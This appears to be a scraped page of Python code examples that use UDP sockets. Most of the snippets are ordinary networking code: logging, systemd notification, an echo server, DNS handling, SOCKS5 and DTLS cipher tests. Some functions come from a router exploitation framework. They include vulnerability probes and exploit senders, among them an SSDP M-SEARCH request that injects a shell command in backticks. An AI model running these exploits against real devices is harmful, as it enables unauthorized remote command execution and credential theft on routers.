def check(self):
    """Probe the target's SSDP service and report whether it looks vulnerable.

    Sends an SSDP ``M-SEARCH`` request over UDP to port 1900 of
    ``self.target`` and inspects the first datagram that comes back.

    Returns:
        True when the reply contains the ``Linux, UPnP/1.0, DIR-`` banner,
        False otherwise (including on any socket error or timeout).
    """
    # Byte literals keep the request valid for socket.send() on Python 3
    # while remaining plain ``str`` on Python 2.
    request = (b"M-SEARCH * HTTP/1.1\r\n"
               b"Host:239.255.255.250:1900\r\n"
               b"ST:upnp:rootdevice\r\n"
               b"Man:\"ssdp:discover\"\r\n"
               b"MX:2\r\n\r\n")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(10)
            sock.connect((self.target, 1900))
            sock.send(request)
            response = sock.recv(65535)
        finally:
            # Release the descriptor even when the probe fails or times out.
            sock.close()
    except Exception:
        return False  # target is not vulnerable

    # True -> target is vulnerable, False -> target is not vulnerable
    return b"Linux, UPnP/1.0, DIR-" in response
python类SOCK_DGRAM的实例源码
def log_event(event_tuple):
    """Format one event and deliver it to the configured log sinks.

    Args:
        event_tuple: sequence whose items 0 and 1 are the seconds and
            microseconds of the event, item 2 the source IP and item 4 the
            destination IP. Every item from index 2 onward is written to the
            log line.

    Events whose source or destination IP is in ``WHITELIST`` are skipped.
    Otherwise the formatted line is:

    * written to the local event log, unless
      ``config.DISABLE_LOCAL_LOG_STORAGE`` is set;
    * sent as a UDP datagram (prefixed with the seconds value) to
      ``config.LOG_SERVER`` (``host:port``) when that option is set;
    * written to stdout when local storage is disabled and no log server is
      configured.

    ``OSError``/``IOError`` are swallowed; the traceback is printed only when
    ``config.SHOW_DEBUG`` is set.
    """
    try:
        sec, usec, src_ip, dst_ip = event_tuple[0], event_tuple[1], event_tuple[2], event_tuple[4]
        if not any(_ in WHITELIST for _ in (src_ip, dst_ip)):
            localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
            event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
            if not config.DISABLE_LOCAL_LOG_STORAGE:
                handle = get_event_log_handle(sec)
                os.write(handle, event)
            if config.LOG_SERVER:
                remote_host, remote_port = config.LOG_SERVER.split(':')
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                try:
                    s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port)))
                finally:
                    # One socket is created per event; close it explicitly so
                    # descriptors are not left to the garbage collector.
                    s.close()
            if config.DISABLE_LOCAL_LOG_STORAGE and not config.LOG_SERVER:
                sys.stdout.write(event)
                sys.stdout.flush()
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def __init__(self, port=17935, clients=None, broadcast=True):
    """Prepare the announcement message and sockets, then start the thread.

    Args:
        port: port number embedded in the announcement message.
        clients: list stored on the instance as ``self.clients``; a new
            empty list is created when omitted.
        broadcast: when true, an additional UDP socket with ``SO_BROADCAST``
            enabled is created; otherwise ``self.bcast_sckt`` is ``None``.

    The thread is marked as a daemon and started before ``__init__`` returns.
    """
    util.Thread.__init__(self)
    self.port = port
    # A literal ``[]`` default would be shared by every instance created
    # without an explicit list, so build a fresh one per instance instead.
    self.clients = [] if clients is None else clients
    msg = '\x00'.join(["PyritServerAnnouncement",
                       '',
                       str(port)])
    # NOTE(review): hashing ``msg`` and appending the raw digest to it only
    # works where ``str`` is a byte string (Python 2) - confirm the target
    # interpreter before porting.
    md = hashlib.sha1()
    md.update(msg)
    self.msg = msg + md.digest()
    self.ucast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    if broadcast:
        self.bcast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.bcast_sckt.bind(('', 0))
        self.bcast_sckt.setsockopt(socket.SOL_SOCKET,
                                   socket.SO_BROADCAST, 1)
    else:
        self.bcast_sckt = None
    self.setDaemon(True)
    self.start()
def _systemd_notify_once():
    """Tell systemd that the service is ready, at most one time.

    systemd publishes the name of its notification socket through the
    NOTIFY_SOCKET environment variable. Once the notification has been sent
    the variable is deleted from the environment, so later calls do nothing.
    A failure to connect or send is logged at debug level and otherwise
    ignored.
    """
    address = os.getenv('NOTIFY_SOCKET')
    if not address:
        return

    if address.startswith('@'):
        # abstract namespace socket: swap the leading '@' for a NUL byte
        address = '\0%s' % address[1:]

    with contextlib.closing(
            socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)) as notifier:
        try:
            notifier.connect(address)
            notifier.sendall(b'READY=1')
            del os.environ['NOTIFY_SOCKET']
        except EnvironmentError:
            LOG.debug("Systemd notification failed", exc_info=True)
def getIfConfig(ifname):
    """Collect address information for a network interface.

    Args:
        ifname: name of the interface to query.

    Returns:
        A dict that always holds ``'ifname'`` and, for every request that
        succeeded before the first failure, the keys ``'addr'``,
        ``'brdaddr'``, ``'hwaddr'`` and ``'netmask'`` with whatever
        ``_ifinfo`` returned for the matching request number.
    """
    ifreq = {'ifname': ifname}
    # request numbers defined in /usr/include/linux/sockios.h on linux 2.6
    requests = {
        'addr': 0x8915,     # SIOCGIFADDR
        'brdaddr': 0x8919,  # SIOCGIFBRDADDR
        'hwaddr': 0x8927,   # SIOCGIFHWADDR
        'netmask': 0x891b,  # SIOCGIFNETMASK
    }
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        for key, request in requests.items():
            ifreq[key] = _ifinfo(sock, request, ifname)
    except Exception:
        # Best effort: keep whatever was gathered before the failure, but do
        # not swallow KeyboardInterrupt/SystemExit like a bare except would.
        pass
    finally:
        sock.close()
    return ifreq
def client():
    """Send one line of user input to the server and print its reply.

    Reads text from standard input, sends it as a single UDP datagram to
    ``(HOST, PORT)``, then blocks until one datagram of at most
    ``MAX_BYTES`` bytes arrives and prints the sender address together with
    the decoded text.
    """
    text = input("Digite algum texto:\n")  # read the message to send
    data = text.encode(ENCODE)  # text -> bytes using the ENCODE codec

    # Sending: the context manager closes the UDP socket even when
    # sendto()/recvfrom() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        dest = (HOST, PORT)  # destination host and port
        sock.sendto(data, dest)

        # Reply from the server
        print(sock.getsockname())  # local address of this socket
        data, address = sock.recvfrom(MAX_BYTES)
        text = data.decode(ENCODE)  # bytes -> text using the ENCODE codec
        print(address, text)
def server():
    """Run a UDP server that acknowledges every datagram it receives.

    Binds a UDP socket to ``(HOST, PORT)`` and loops forever: each incoming
    datagram (up to ``MAX_BYTES`` bytes) is decoded with ``ENCODE`` and
    printed with its sender address, then a message reporting the number of
    bytes received is sent back to that sender.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind((HOST, PORT))

    while True:
        # Wait for the next datagram and show who sent what.
        payload, peer = listener.recvfrom(MAX_BYTES)
        print(peer, payload.decode(ENCODE))

        # Answer with the size of the datagram just received.
        reply = "Total de dados recebidos: " + str(len(payload))
        listener.sendto(reply.encode(ENCODE), peer)
def __init__(self, address, callback, host, port, device_type=None,
             backend='auto', interface=None):
    """Store the connection settings, open a UDP socket and pick a backend.

    Args:
        address: stored as ``self.address``.
        callback: stored as ``self.callback``.
        host: stored as ``self.HOST`` (e.g. '192.168.1.118').
        port: stored as ``self.PORT`` (e.g. 9999).
        device_type: stored as ``self.device_type``.
        backend: ``'auto'``, ``'gatt'`` or ``'bgapi'``. ``'auto'`` resolves
            to ``'gatt'`` when ``platform`` is ``"linux"``/``"linux2"`` and
            to ``'bgapi'`` otherwise.
        interface: stored as ``self.interface``.

    Raises:
        ValueError: if ``backend`` is none of the accepted values.
    """
    self.address = address
    self.callback = callback
    self.device_type = device_type
    self.interface = interface
    self.HOST = host
    self.PORT = port
    self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    if backend == 'auto':
        on_linux = platform in ("linux", "linux2")
        self.backend = 'gatt' if on_linux else 'bgapi'
        return
    if backend not in ['gatt', 'bgapi']:
        raise ValueError('Backend must be auto, gatt or bgapi')
    self.backend = backend
def handle_event(self, sock, fd, event):
    """Handle an event-loop notification for the DNS socket.

    Args:
        sock: socket the event was reported for; events for any socket other
            than ``self._sock`` are ignored.
        fd: file descriptor of ``sock`` (not used here).
        event: event bitmask; tested against ``eventloop.POLL_ERR``.

    On an error event the current socket is removed from the loop, closed
    and replaced by a fresh non-blocking UDP socket registered for
    ``POLL_IN``. Otherwise one datagram of up to 1024 bytes is read; it is
    passed to ``self._handle_data`` only when its source address is listed
    in ``self._servers``.
    """
    if sock != self._sock:
        return
    if event & eventloop.POLL_ERR:
        logging.error('dns socket err')
        self._loop.remove(self._sock)
        self._sock.close()
        # TODO when dns server is IPv6
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                                   socket.SOL_UDP)
        self._sock.setblocking(False)
        self._loop.add(self._sock, eventloop.POLL_IN, self)
    else:
        data, addr = sock.recvfrom(1024)
        if addr[0] not in self._servers:
            # logging.warn is a deprecated alias; use logging.warning.
            logging.warning('received a packet other than our dns')
            return
        self._handle_data(data)
def check(self):
    """Probe UDP port 53413 of the target and look for known reply endings.

    Sends eight NUL bytes to ``self.target`` and reads one datagram of up to
    1024 bytes, waiting at most 10 seconds.

    Returns:
        True when the reply ends with one of the two known signatures,
        False otherwise (including when nothing could be sent or received).
    """
    # Byte literals work with sockets on Python 3 and are plain ``str`` on
    # Python 2.
    signatures = (
        b"\xD0\xA5Login:",
        b"\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00",
    )
    response = b""
    payload = b"\x00" * 8

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(10.0)
    try:
        sock.sendto(payload, (self.target, 53413))
        response = sock.recv(1024)
    except Exception:
        # No reply or a socket failure: fall through with an empty response,
        # which matches no signature.
        pass
    finally:
        sock.close()

    # True -> target is vulnerable, False -> target is not vulnerable
    return response.endswith(signatures)
def run(self):
    """Send ``self.payload`` to UDP port 69 of the target and report the outcome.

    One datagram of up to 2048 bytes is awaited for at most 10 seconds. The
    attempt is reported as successful when the reply contains
    ``UseUserCredential``; in that case the reply itself is printed too.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(10)

        print_status("Sending payload")
        sock.sendto(self.payload, (self.target, 69))

        try:
            response = sock.recv(2048)
        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
    finally:
        # Close the socket on every path, including the early return above.
        sock.close()

    if not response:
        print_error("Exploit failed - empty response")
    elif b"UseUserCredential" in response:
        # Byte literal: recv() yields bytes on Python 3 (and str on Python 2,
        # where b"" literals are str as well).
        print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
        print_info(response)
    else:
        print_error("Exploit failed - credentials not found in response")
def run(self):
    """Send ``self.payload`` to UDP port 43690 of the target and print any reply.

    One datagram of up to 1024 bytes is awaited for at most 10 seconds. A
    non-empty reply is reported as success and printed; an empty reply
    produces no output.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(10)

        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
    finally:
        # Close the socket on every path, including the early return above.
        sock.close()

    if response:
        print_success("Exploit success")
        print_info(response)
def execute(self, cmd):
    """Send an SSDP ``M-SEARCH`` request carrying ``cmd`` to the target.

    ``cmd`` is placed between backticks inside the ``ST:uuid:`` header and
    the request is sent over UDP to port 1900 of ``self.target``. No reply
    is read.

    Args:
        cmd: command text to embed in the request.

    Returns:
        Always the empty string; socket errors are ignored.
    """
    request = ("M-SEARCH * HTTP/1.1\r\n"
               "Host:239.255.255.250:1900\r\n"
               "ST:uuid:`" + cmd + "`\r\n"
               "Man:\"ssdp:discover\"\r\n"
               "MX:2\r\n\r\n")
    # socket.send() needs bytes on Python 3; on Python 2 a ``str`` request
    # already is bytes and is left untouched.
    if not isinstance(request, bytes):
        request = request.encode("utf-8")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(10)
            sock.connect((self.target, 1900))
            sock.send(request)
        finally:
            # Close the socket even when connect()/send() fails.
            sock.close()
    except socket.error:
        pass  # delivery failures are deliberately ignored

    return ""
def check(self):
    """Probe the target's SSDP service and report whether it looks vulnerable.

    Sends an SSDP ``M-SEARCH`` request over UDP to port 1900 of
    ``self.target`` and inspects the first datagram that comes back.

    Returns:
        True when the reply contains the ``Linux, UPnP/1.0, DIR-`` banner,
        False otherwise (including on any socket error or timeout).
    """
    # Byte literals keep the request valid for socket.send() on Python 3
    # while remaining plain ``str`` on Python 2.
    request = (b"M-SEARCH * HTTP/1.1\r\n"
               b"Host:239.255.255.250:1900\r\n"
               b"ST:upnp:rootdevice\r\n"
               b"Man:\"ssdp:discover\"\r\n"
               b"MX:2\r\n\r\n")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(10)
            sock.connect((self.target, 1900))
            sock.send(request)
            response = sock.recv(65535)
        finally:
            # Release the descriptor even when the probe fails or times out.
            sock.close()
    except Exception:
        return False  # target is not vulnerable

    # True -> target is vulnerable, False -> target is not vulnerable
    return b"Linux, UPnP/1.0, DIR-" in response
LuckyThirteen_vulnerability_tester_plugin.py 文件源码
项目:midip-sslyze
作者: soukupa5
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def _test_dtls_ciphersuite(self, server_connectivity_info, dtls_version, cipher, port):
    """Check whether the server accepts one cipher suite over DTLS.

    Used by worker threads while DTLS protocol versions are being tested.

    Args:
        server_connectivity_info (ServerConnectivityInfo): connection
            details of the server; its ``ip_address`` is used here.
        dtls_version: protocol version passed to ``SSL.Context``.
        cipher (str): OpenSSL name of the cipher suite to test.
        port (int): port number to connect to.

    Returns:
        ``AcceptCipher`` when the handshake succeeds, ``RejectCipher``
        (carrying the error message) when it raises ``SSL.Error``. Both are
        built with the RFC name looked up in
        ``TLS_OPENSSL_TO_RFC_NAMES_MAPPING``.
    """
    cnx = SSL.Context(dtls_version)
    cnx.set_cipher_list(cipher)
    conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
    try:
        conn.connect((server_connectivity_info.ip_address, port))
        conn.do_handshake()
    except SSL.Error as e:
        # Exceptions are not subscriptable on Python 3, so go through .args
        # (equivalent to e[0] on Python 2).
        # presumably args[0] is a list of (lib, function, reason) tuples -
        # verify against the SSL binding in use
        error_msg = e.args[0][0][2]
        cipher_result = RejectCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher], error_msg)
    else:
        cipher_result = AcceptCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher])
    finally:
        conn.shutdown()
        conn.close()
    return cipher_result
LuckyThirteen_vulnerability_tester_plugin.py 文件源码
项目:midip-sslyze
作者: soukupa5
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def test_dtls_protocol_support(self, server_connectivity_info, dtls_version, port):
    """Test whether the server supports a DTLS protocol version.

    Args:
        server_connectivity_info (ServerConnectivityInfo): connection
            details of the server; its ``ip_address`` is used here.
        dtls_version: DTLS protocol version to test, passed to
            ``SSL.Context``.
        port (int): port number to connect to.

    Returns:
        True when the handshake succeeds, False when it fails with an
        ``SSL.SysCallError`` other than "connection refused".

    Raises:
        ValueError: when the connection is refused, which is treated as a
            wrong port having been given.
    """
    # Function-scope import: only this method needs the errno constant.
    import errno

    cnx = SSL.Context(dtls_version)
    cnx.set_cipher_list('ALL:COMPLEMENTOFALL')
    conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
    try:
        conn.connect((server_connectivity_info.ip_address, port))
        conn.do_handshake()
    except SSL.SysCallError as ex:
        # Exceptions are not subscriptable on Python 3; ex.args[0] is the
        # same value ex[0] gave on Python 2. ECONNREFUSED is 111 on Linux.
        if ex.args[0] == errno.ECONNREFUSED:
            raise ValueError('LuckyThirteenVulnerabilityTesterPlugin: It is entered wrong port for DTLS connection.')
        else:
            support = False
    else:
        support = True
    finally:
        conn.shutdown()
        conn.close()
    return support
def test_sock_connect_address(self):
    # With debug mode enabled, sock_connect() has to verify that the address
    # it is given was already resolved (via _check_resolved_address()), so
    # passing a host name must raise ValueError for every family/type pair.
    self.loop.set_debug(True)

    unresolved = ('www.python.org', 80)
    cases = [(socket.AF_INET, unresolved)]
    if support.IPV6_ENABLED:
        cases.append((socket.AF_INET6, unresolved))
        cases.append((socket.AF_INET6, unresolved + (0, 0)))

    for family, address in cases:
        for kind in (socket.SOCK_STREAM, socket.SOCK_DGRAM):
            with socket.socket(family, kind) as sock:
                sock.setblocking(False)
                pending = self.loop.sock_connect(sock, address)
                with self.assertRaises(ValueError) as caught:
                    self.loop.run_until_complete(pending)
                self.assertIn('address must be resolved',
                              str(caught.exception))
def sendto(self, bytes, *args, **kwargs):
    """Send a datagram, prefixing it with a header on UDP sockets.

    Sockets whose type is not ``SOCK_DGRAM`` are delegated unchanged to
    ``_BaseSocket.sendto``. For datagram sockets the last positional
    argument is the destination address and any preceding ones are flags;
    the socket is first bound to ``("", 0)`` if ``self._proxyconn`` is not
    set.

    Returns:
        The value returned by ``_BaseSocket.send`` minus the header's write
        position (i.e. the header bytes are not counted).
    """
    if self.type != socket.SOCK_DGRAM:
        return _BaseSocket.sendto(self, bytes, *args, **kwargs)
    if not self._proxyconn:
        self.bind(("", 0))

    flags, address = args[:-1], args[-1]

    RSV = b"\x00\x00"
    STANDALONE = b"\x00"

    # Header layout: reserved bytes, standalone marker, then the destination
    # address as written by _write_SOCKS5_address().
    header = BytesIO()
    header.write(RSV + STANDALONE)
    self._write_SOCKS5_address(address, header)

    datagram = header.getvalue() + bytes
    return _BaseSocket.send(self, datagram, *flags, **kwargs) - header.tell()
def handle_event(self, sock, fd, event):
    """Handle an event-loop notification for the DNS socket.

    Args:
        sock: socket the event was reported for; events for any socket other
            than ``self._sock`` are ignored.
        fd: file descriptor of ``sock`` (not used here).
        event: event bitmask; tested against ``eventloop.POLL_ERR``.

    On an error event the current socket is removed from the loop, closed
    and replaced by a fresh non-blocking UDP socket registered for
    ``POLL_IN``. Otherwise one datagram of up to 1024 bytes is read; it is
    passed to ``self._handle_data`` only when its source address is listed
    in ``self._servers``.
    """
    if sock != self._sock:
        return
    if event & eventloop.POLL_ERR:
        logging.error('dns socket err')
        self._loop.remove(self._sock)
        self._sock.close()
        # TODO when dns server is IPv6
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                                   socket.SOL_UDP)
        self._sock.setblocking(False)
        self._loop.add(self._sock, eventloop.POLL_IN, self)
    else:
        data, addr = sock.recvfrom(1024)
        if addr[0] not in self._servers:
            # logging.warn is a deprecated alias; use logging.warning.
            logging.warning('received a packet other than our dns')
            return
        self._handle_data(data)
def get_local_ip():
    """Try to determine the local IP address of the machine.

    Connects a UDP socket to Google Public DNS (8.8.8.8) and returns the
    local address the socket ended up with. When the socket cannot be
    created or connected, falls back to resolving the machine's own host
    name.

    Returns:
        The local IP address as a string.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error:
        # Without a socket there is nothing to close; the original
        # ``finally: sock.close()`` would have raised UnboundLocalError here
        # and hidden the fallback.
        return socket.gethostbyname(socket.gethostname())

    try:
        # Use Google Public DNS server to determine own IP
        sock.connect(('8.8.8.8', 80))
        return sock.getsockname()[0]
    except socket.error:
        return socket.gethostbyname(socket.gethostname())
    finally:
        sock.close()
# Taken from http://stackoverflow.com/a/23728630